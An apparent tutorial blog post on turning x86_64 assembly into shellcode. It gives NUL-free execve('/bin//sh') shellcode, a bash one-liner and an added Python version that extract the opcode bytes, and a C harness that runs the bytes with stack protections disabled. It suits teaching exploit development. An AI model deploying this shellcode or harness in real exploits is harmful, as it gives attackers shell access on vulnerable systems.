Converting assembly to shellcode

The assembly code is as follows:

section .text
    global _start
_start:
    jmp shell           ; jmp/call/pop: jump forward to the call below
here:
    xor rax,rax         ; rax = 0
    pop rdi             ; the return address pushed by call = address of "/bin//sh"
    xor rsi,rsi         ; argv = NULL
    xor rdx,rdx         ; envp = NULL
    add rax,59          ; rax = 59 = __NR_execve on x86_64
    syscall             ; execve("/bin//sh", NULL, NULL)
shell:
    call here           ; pushes the address of the string that follows it, then jumps back
bash db "/bin//sh"      ; no NUL here: the path relies on the zero bytes after .text (or the C string's terminator)

Build and run:

jay@ubuntu:~/Desktop/bin2shell$ vim shell.asm
jay@ubuntu:~/Desktop/bin2shell$ nasm -f elf64 shell.asm -o shell.o
jay@ubuntu:~/Desktop/bin2shell$ ld shell.o -o shell 
jay@ubuntu:~/Desktop/bin2shell$ ./shell 
$ ls
README.md  bin2shell.sh  shell  shell.asm  shell.o
$ exit

The following bin2shell.sh script converts the shell binary into x86_64 shellcode:

#!/bin/bash
# Take the opcode-byte column (tab-separated field 2) of every instruction line
# in the disassembly and print each byte as \xNN, all on one line.
for i in $(objdump -d "$1" | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo

How it works: in the output of objdump -d, every instruction line starts with a space followed by an address; the script keeps only those lines, takes the second (tab-separated) field, which holds the raw opcode bytes, prefixes each byte with "\x", and echoes the result.

jay@ubuntu:~/Desktop/bin2shell$ objdump -d shell

shell:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:   eb 10                   jmp    400092 <shell>

0000000000400082 <here>:
  400082:   48 31 c0                xor    %rax,%rax
  400085:   5f                      pop    %rdi
  400086:   48 31 f6                xor    %rsi,%rsi
  400089:   48 31 d2                xor    %rdx,%rdx
  40008c:   48 83 c0 3b             add    $0x3b,%rax
  400090:   0f 05                   syscall 

0000000000400092 <shell>:
  400092:   e8 eb ff ff ff          callq  400082 <here>

0000000000400097 <bash>:
  400097:   2f                      (bad)  
  400098:   62                      (bad)  
  400099:   69                      .byte 0x69
  40009a:   6e                      outsb  %ds:(%rsi),(%dx)
  40009b:   2f                      (bad)  
  40009c:   2f                      (bad)  
  40009d:   73 68                   jae    400107 <bash+0x70>

The final result:

jay@ubuntu:~/Desktop/bin2shell$ ./bin2shell.sh  shell 
\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68

Finally, the C code that runs the shellcode:

# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing

#include <stdio.h>
#include <string.h>

unsigned char code[] = "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";

int main(void)
{
    /* strlen stops at the first NUL byte, so this length is only right for
       shellcode that contains no 0x00 (true for the 31 bytes above). */
    printf("Shellcode Length:  %d\n", (int)strlen(code));

    /* Declare a function pointer, cast the address of the code array to the
       same type, and call it. code[] lives in the writable data segment; on
       x86_64 kernels before 5.8, -z execstack also made every readable mapping
       executable, which is what lets this call succeed. With NX enforced the
       bytes must be copied into an explicitly executable mapping instead. */
    int (*ret)() = (int (*)())code;
    ret();

    return 0;
}
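A Python re-implementation of the extraction step, added here as an example (it is not code from the post or its repository): it parses the objdump listing shown above, rebuilds the \x string the bash one-liner prints, and reports the length the C harness's strlen() would see. The listing is embedded as constructed sample input written with objdump's tab separators, so it runs offline without nasm, ld or objdump.

```python
import re

# Constructed sample: the `objdump -d shell` listing from the post, written with
# objdump's real tab separators (address TAB bytes TAB mnemonic).
OBJDUMP_LISTING = (
    "0000000000400080 <_start>:\n"
    "  400080:\teb 10          \tjmp    400092 <shell>\n"
    "0000000000400082 <here>:\n"
    "  400082:\t48 31 c0       \txor    %rax,%rax\n"
    "  400085:\t5f             \tpop    %rdi\n"
    "  400086:\t48 31 f6       \txor    %rsi,%rsi\n"
    "  400089:\t48 31 d2       \txor    %rdx,%rdx\n"
    "  40008c:\t48 83 c0 3b    \tadd    $0x3b,%rax\n"
    "  400090:\t0f 05          \tsyscall \n"
    "0000000000400092 <shell>:\n"
    "  400092:\te8 eb ff ff ff \tcallq  400082 <here>\n"
    "0000000000400097 <bash>:\n"
    "  400097:\t2f             \t(bad)  \n"
    "  400098:\t62             \t(bad)  \n"
    "  400099:\t69             \t.byte 0x69\n"
    "  40009a:\t6e             \toutsb  %ds:(%rsi),(%dx)\n"
    "  40009b:\t2f             \t(bad)  \n"
    "  40009c:\t2f             \t(bad)  \n"
    "  40009d:\t73 68          \tjae    400107 <bash+0x70>\n"
)
HEX_BYTE = re.compile(r"^[0-9a-f]{2}$")

def extract_bytes(listing: str) -> bytes:
    # Same selection as `grep "^ " | cut -f2`: only instruction lines start with
    # a space, and their tab-separated second field is the raw byte column.
    out = bytearray()
    for line in listing.splitlines():
        if not line.startswith(" "):
            continue
        fields = line.split("\t")
        for tok in fields[1].split() if len(fields) > 1 else []:
            if not HEX_BYTE.match(tok):
                raise ValueError(f"unexpected token in byte column: {tok!r}")
            out.append(int(tok, 16))
    return bytes(out)

def to_c_string(blob: bytes) -> str:
    # The \x-escaped form the bash one-liner echoes, ready for the C harness.
    return "".join(f"\\x{b:02x}" for b in blob)

def strlen_visible(blob: bytes) -> int:
    # What the harness's strlen(code) reports: it stops at the first 0x00 byte,
    # so a blob containing a NUL would be misreported and silently truncated.
    return blob.index(0) if 0 in blob else len(blob)
```

Running extract_bytes on the embedded listing yields the same 31 bytes as the C array, and the last eight of them decode to "/bin//sh".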

Code: https://github.com/tangsilian/SomeCode/tree/master/bin2shellcode

References:
https://www.exploit-db.com/exploits/42791/
cut command reference: https://www.ibm.com/support/knowledgecenter/zh/ssw_aix_72/com.ibm.aix.cmds1/cut.htm

posted @ 2017-09-28 16:05  Tesi1a  views (1104)  comments (0)